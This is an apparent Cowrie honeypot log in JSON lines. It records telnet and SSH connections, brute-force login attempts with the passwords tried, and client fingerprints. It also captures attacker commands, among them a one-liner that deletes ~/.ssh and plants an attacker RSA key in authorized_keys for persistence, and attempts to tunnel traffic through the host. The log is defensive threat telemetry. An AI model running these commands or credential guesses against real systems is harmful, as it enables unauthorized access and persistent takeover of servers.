{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:25.076123Z","src_ip":"212.227.235.229","session":"b2bee80b8d60"}
{"eventid":"cowrie.session.connect","src_ip":"187.228.63.14","src_port":36390,"dst_ip":"1.2.3.4","dst_port":23,"session":"7522f66db943","protocol":"telnet","message":"New connection: 187.228.63.14:36390 (1.2.3.4:23) [session: 7522f66db943]","sensor":"my-vps","timestamp":"2025-08-26T19:11:26.504315Z"}
{"eventid":"cowrie.session.closed","duration":12.783013343811035,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:30.960028Z","src_ip":"212.227.235.229","session":"d55eb9a6986f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35142,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b79183e9bc4","protocol":"telnet","message":"New connection: 212.227.235.229:35142 (1.2.3.4:23) [session: 2b79183e9bc4]","sensor":"my-vps","timestamp":"2025-08-26T19:11:31.209951Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49877,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f8c5aee76de","protocol":"telnet","message":"New connection: 212.227.125.160:49877 (1.2.3.4:23) [session: 4f8c5aee76de]","sensor":"my-vps","timestamp":"2025-08-26T19:11:37.484384Z"}
{"eventid":"cowrie.session.closed","duration":12.972408294677734,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:39.476641Z","src_ip":"187.228.63.14","session":"7522f66db943"}
{"eventid":"cowrie.session.closed","duration":12.930336952209473,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:44.140221Z","src_ip":"212.227.235.229","session":"2b79183e9bc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35382,"dst_ip":"1.2.3.4","dst_port":23,"session":"3fdf63bedeaf","protocol":"telnet","message":"New connection: 212.227.235.229:35382 (1.2.3.4:23) [session: 3fdf63bedeaf]","sensor":"my-vps","timestamp":"2025-08-26T19:11:44.376794Z"}
{"eventid":"cowrie.session.closed","duration":14.188369989395142,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:51.672683Z","src_ip":"212.227.125.160","session":"4f8c5aee76de"}
{"eventid":"cowrie.session.closed","duration":13.603615283966064,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:57.980344Z","src_ip":"212.227.235.229","session":"3fdf63bedeaf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35606,"dst_ip":"1.2.3.4","dst_port":23,"session":"934044004377","protocol":"telnet","message":"New connection: 212.227.235.229:35606 (1.2.3.4:23) [session: 934044004377]","sensor":"my-vps","timestamp":"2025-08-26T19:11:58.256069Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43782,"dst_ip":"1.2.3.4","dst_port":22,"session":"2922489c222e","protocol":"ssh","message":"New connection: 212.227.235.229:43782 (1.2.3.4:22) [session: 2922489c222e]","sensor":"my-vps","timestamp":"2025-08-26T19:12:07.018812Z"}
{"eventid":"cowrie.session.closed","duration":13.593908786773682,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:11.849904Z","src_ip":"212.227.235.229","session":"934044004377"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35829,"dst_ip":"1.2.3.4","dst_port":23,"session":"85ecd117cdda","protocol":"telnet","message":"New connection: 212.227.235.229:35829 (1.2.3.4:23) [session: 85ecd117cdda]","sensor":"my-vps","timestamp":"2025-08-26T19:12:12.089156Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62218,"dst_ip":"1.2.3.4","dst_port":22,"session":"fefde7fe02d9","protocol":"ssh","message":"New connection: 217.72.205.35:62218 (1.2.3.4:22) [session: fefde7fe02d9]","sensor":"my-vps","timestamp":"2025-08-26T19:12:20.528882Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:20.530092Z","src_ip":"217.72.205.35","session":"fefde7fe02d9"}
{"eventid":"cowrie.session.closed","duration":12.720012187957764,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:24.808019Z","src_ip":"212.227.235.229","session":"85ecd117cdda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36092,"dst_ip":"1.2.3.4","dst_port":23,"session":"68a999ae40a3","protocol":"telnet","message":"New connection: 212.227.235.229:36092 (1.2.3.4:23) [session: 68a999ae40a3]","sensor":"my-vps","timestamp":"2025-08-26T19:12:25.025608Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52305,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f340f749043","protocol":"ssh","message":"New connection: 212.227.235.229:52305 (1.2.3.4:22) [session: 5f340f749043]","sensor":"my-vps","timestamp":"2025-08-26T19:12:32.009435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:12:32.013433Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:12:32.263219Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.login.success","username":"root","password":"yy123456@","message":"login attempt [root/yy123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:12:33.265810Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:12:33.836648Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:12:33.837337Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:12:33.838486Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:34.093671Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:12:34.606795Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:12:34.607531Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:12:34.862126Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:34.863322Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52952,"dst_ip":"1.2.3.4","dst_port":22,"session":"305083d31334","protocol":"ssh","message":"New connection: 212.227.235.229:52952 (1.2.3.4:22) [session: 305083d31334]","sensor":"my-vps","timestamp":"2025-08-26T19:12:35.114428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:12:35.119775Z","src_ip":"212.227.235.229","session":"305083d31334"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:12:35.373752Z","src_ip":"212.227.235.229","session":"305083d31334"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:12:36.386270Z","src_ip":"212.227.235.229","session":"305083d31334"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8659,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8e60eea708","protocol":"ssh","message":"New connection: 212.227.235.229:8659 (1.2.3.4:22) [session: 0e8e60eea708]","sensor":"my-vps","timestamp":"2025-08-26T19:12:36.551087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:12:36.551896Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:12:36.676732Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@$$w0rd@123","message":"login attempt [admin/P@$$w0rd@123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:12:37.267838Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:37.640768Z","src_ip":"212.227.235.229","session":"305083d31334"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53534,"dst_ip":"1.2.3.4","dst_port":22,"session":"15c7ba518c61","protocol":"ssh","message":"New connection: 212.227.235.229:53534 (1.2.3.4:22) [session: 15c7ba518c61]","sensor":"my-vps","timestamp":"2025-08-26T19:12:37.887159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:12:37.889187Z","src_ip":"212.227.235.229","session":"15c7ba518c61"}
{"eventid":"cowrie.session.closed","duration":13.032766580581665,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:38.058307Z","src_ip":"212.227.235.229","session":"68a999ae40a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:12:38.145481Z","src_ip":"212.227.235.229","session":"15c7ba518c61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36364,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd4a4472f44d","protocol":"telnet","message":"New connection: 212.227.235.229:36364 (1.2.3.4:23) [session: bd4a4472f44d]","sensor":"my-vps","timestamp":"2025-08-26T19:12:38.310993Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"w5basAtr","message":"login attempt [admin/w5basAtr] failed","sensor":"my-vps","timestamp":"2025-08-26T19:12:38.394656Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:12:39.181517Z","src_ip":"212.227.235.229","session":"15c7ba518c61"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:39.436924Z","src_ip":"212.227.235.229","session":"5f340f749043"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:39.440489Z","src_ip":"212.227.235.229","session":"15c7ba518c61"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6","message":"login attempt [admin/6] failed","sensor":"my-vps","timestamp":"2025-08-26T19:12:39.521254Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.login.failed","username":"admin","password":"B4F0U9FBGqNH","message":"login attempt [admin/B4F0U9FBGqNH] failed","sensor":"my-vps","timestamp":"2025-08-26T19:12:40.653698Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd123","message":"login attempt [admin/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:12:41.781144Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:42.908412Z","src_ip":"212.227.235.229","session":"0e8e60eea708"}
{"eventid":"cowrie.session.closed","duration":13.641964435577393,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:51.952888Z","src_ip":"212.227.235.229","session":"bd4a4472f44d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36586,"dst_ip":"1.2.3.4","dst_port":23,"session":"4164b525ebe8","protocol":"telnet","message":"New connection: 212.227.235.229:36586 (1.2.3.4:23) [session: 4164b525ebe8]","sensor":"my-vps","timestamp":"2025-08-26T19:12:52.160634Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59262,"dst_ip":"1.2.3.4","dst_port":22,"session":"23b355a35904","protocol":"ssh","message":"New connection: 212.227.235.229:59262 (1.2.3.4:22) [session: 23b355a35904]","sensor":"my-vps","timestamp":"2025-08-26T19:12:53.940936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:12:53.941826Z","src_ip":"212.227.235.229","session":"23b355a35904"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:54.230178Z","src_ip":"212.227.235.229","session":"23b355a35904"}
{"eventid":"cowrie.session.closed","duration":"48.3","message":"Connection lost after 48.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:12:55.332881Z","src_ip":"212.227.235.229","session":"2922489c222e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17165,"dst_ip":"1.2.3.4","dst_port":22,"session":"487ca531c363","protocol":"ssh","message":"New connection: 213.209.150.239:17165 (1.2.3.4:22) [session: 487ca531c363]","sensor":"my-vps","timestamp":"2025-08-26T19:13:03.860095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:13:03.869803Z","src_ip":"213.209.150.239","session":"487ca531c363"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T19:13:03.917194Z","src_ip":"213.209.150.239","session":"487ca531c363"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.199360Z","src_ip":"213.209.150.239","session":"487ca531c363"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8870,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8870","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.257232Z","session":"487ca531c363"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.313920Z","src_ip":"213.209.150.239","session":"487ca531c363"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":10914,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10914","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.471016Z","session":"487ca531c363"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.527808Z","src_ip":"213.209.150.239","session":"487ca531c363"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.585298Z","src_ip":"213.209.150.239","session":"487ca531c363"}
{"eventid":"cowrie.session.closed","duration":12.777952671051025,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:04.938508Z","src_ip":"212.227.235.229","session":"4164b525ebe8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36815,"dst_ip":"1.2.3.4","dst_port":23,"session":"801bed91221a","protocol":"telnet","message":"New connection: 212.227.235.229:36815 (1.2.3.4:23) [session: 801bed91221a]","sensor":"my-vps","timestamp":"2025-08-26T19:13:05.190807Z"}
{"eventid":"cowrie.session.closed","duration":13.815664291381836,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:19.006371Z","src_ip":"212.227.235.229","session":"801bed91221a"}
